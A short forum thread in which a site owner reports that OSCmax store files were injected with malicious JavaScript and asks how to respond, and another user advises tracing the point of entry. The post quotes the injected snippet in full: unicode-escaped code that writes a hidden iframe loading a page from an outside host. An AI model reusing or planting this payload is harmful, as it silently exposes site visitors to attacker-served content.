Hack javascript malware

[giuspy]

I own a OSCmax site(2.0.0-RC3-0-1). Yesterday I discover that:
-All catalog files
-All FCKEditor files
-All admin files
were appended with the following hack
"<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074 \u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u 006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u00 62\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072 \u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u 0032\u0036\u0030\u0033\u002f\u0069\u006e\u0064\u00 65\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069 \u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u 0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u00 74\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073 \u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u 0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u00 61\u006d\u0065\u003e');
</script> "
I manually removed the hack. What do you suggest ?
All my directories are CHMOD 755 and files 644

[michael_s]

I suggest you try to backtrack how your site was hacked. It could be many things. Are you on a shared server? If so, it will be difficult to determine the point of entry, since you will not have access to the server logs.